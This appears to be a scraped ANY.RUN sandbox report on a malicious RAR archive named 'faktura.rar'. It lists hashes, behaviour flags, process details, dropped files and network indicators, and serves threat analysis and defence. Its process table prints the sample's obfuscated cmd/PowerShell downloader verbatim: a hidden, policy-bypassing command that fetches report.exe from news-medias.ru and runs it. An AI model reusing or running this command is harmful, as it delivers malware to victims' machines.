analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

faktura.rar

Full analysis: https://app.any.run/tasks/3131fcf2-583f-4877-b8f0-a426030ffdb8
Verdict: Malicious activity
Analysis date: April 23, 2019, 12:08:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, flags: EncryptedBlockHeader
MD5:

251C7840A0EC441D2DA0D67EB66D4595

SHA1:

AA09309CF869E887ACB08FF4B8163B9982B7F855

SHA256:

0FF79E673B4F3B4962632E5D99E79FF8C1A05AD1C6F45000F7BA5B6AABC44FF0

SSDEEP:

384:AcGzm+2sUrTIq0vs0w6oYqlkv6g1EoZfJpeh3bW:Ac4HKIq7goYokv6g2o7Mtq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3284)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 408)
    • Creates files in the user directory

      • powershell.exe (PID: 916)
    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 184)
  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 2392)
      • iexplore.exe (PID: 2868)
    • Changes internet zones settings

      • iexplore.exe (PID: 2868)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2392)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2392)
    • Application launched itself

      • chrome.exe (PID: 184)
    • Reads settings of System Certificates

      • chrome.exe (PID: 184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v-4.x) (58.3)
.rar | RAR compressed archive (gen) (41.6)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
65
Monitored processes
32
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe iexplore.exe iexplore.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2172"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\faktura.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
408"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\2.js" C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3284"C:\Windows\System32\cmd.exe" /c LtmVTxhyZgAGjYU & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','%temp%SKg43.exe'); & start %temp%SKg43.exe & eCAWmzyjnGvNIBaC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
916powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://news-medias.ru/report.exe','C:\Users\admin\AppData\Local\TempSKg43.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2868"C:\Program Files\Internet Explorer\iexplore.exe" C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2392"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2868 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
184"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
2128"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=73.0.3683.75 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x6cc90f18,0x6cc90f28,0x6cc90f34C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
2380"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1956 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
73.0.3683.75
3808"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=916,5944479461236246277,14687107204532987306,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwAAAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=1282319300283490229 --mojo-platform-channel-handle=1016 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
73.0.3683.75
Total events
1 707
Read events
1 449
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
57
Text files
170
Unknown types
4

Dropped files

PID
Process
Filename
Type
916powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZFD2UUBEUDXYJLPLV4J.temp
MD5:
SHA256:
2868iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
2868iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
916powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
916powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF117ec2.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2392iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\CTUJGMVO\httpErrorPagesScripts[1]text
MD5:E7CA76A3C9EE0564471671D500E3F0F3
SHA256:58268CA71A28973B756A48BBD7C9DC2F6B87B62AE343E582CE067C725275B63C
2868iexplore.exeC:\Users\admin\AppData\Local\Temp\StructuredQuery.logtext
MD5:F8B7D04345EAC6B69BAF26EE562860B3
SHA256:EC21892BB851D935EF0D9FE5C6727D585ED8FA5EC1509CE0ABA551216819999C
2392iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
2172WinRAR.exeC:\Users\admin\Desktop\2.jstext
MD5:0A940D03B77D951E2CCF07073C31EFF7
SHA256:BA1FD6DD130D91182F9D0EB9E0C542B0982B87B4213BED08D0CCBD7827074F5C
2392iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:C7373E565C404EEA5EE6791F37E52C6C
SHA256:6943F34E5894573D8704AB32338948F816B5B0F2DAE8B155013B109EAB6E3671
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
20
TCP/UDP connections
36
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
184
chrome.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
916
powershell.exe
GET
80.99.221.105:80
http://news-medias.ru/report.exe
HU
malicious
2392
iexplore.exe
GET
80.99.221.105:80
http://news-medias.ru/report.exe
HU
malicious
916
powershell.exe
GET
80.99.221.105:80
http://news-medias.ru/report.exe
HU
malicious
184
chrome.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
184
chrome.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
184
chrome.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
184
chrome.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
184
chrome.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
184
chrome.exe
GET
200.91.115.40:80
http://news-medias.ru/report.exe
CR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
184
chrome.exe
172.217.16.142:443
clients1.google.com
Google Inc.
US
whitelisted
916
powershell.exe
80.99.221.105:80
news-medias.ru
Liberty Global Operations B.V.
HU
malicious
2868
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
184
chrome.exe
172.217.21.195:443
www.google.com.ua
Google Inc.
US
whitelisted
80.99.221.105:80
news-medias.ru
Liberty Global Operations B.V.
HU
malicious
184
chrome.exe
216.58.207.67:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
184
chrome.exe
216.58.210.3:443
ssl.gstatic.com
Google Inc.
US
whitelisted
184
chrome.exe
216.58.210.13:443
accounts.google.com
Google Inc.
US
whitelisted
184
chrome.exe
172.217.18.14:80
redirector.gvt1.com
Google Inc.
US
whitelisted
184
chrome.exe
172.217.22.14:443
apis.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
news-medias.ru
  • 80.99.221.105
  • 62.73.70.146
  • 93.152.165.187
  • 62.141.241.11
  • 193.107.99.167
  • 181.39.233.180
  • 91.201.175.46
  • 213.222.130.75
  • 5.253.53.236
  • 200.91.115.40
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.google.com.ua
  • 172.217.21.195
whitelisted
clientservices.googleapis.com
  • 216.58.207.67
whitelisted
accounts.google.com
  • 216.58.210.13
shared
clients1.google.com
  • 172.217.16.142
whitelisted
ssl.gstatic.com
  • 216.58.210.3
whitelisted
www.gstatic.com
  • 172.217.16.195
whitelisted
apis.google.com
  • 172.217.22.14
whitelisted
www.google.com
  • 172.217.16.196
whitelisted

Threats

PID
Process
Class
Message
184
chrome.exe
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
No debug info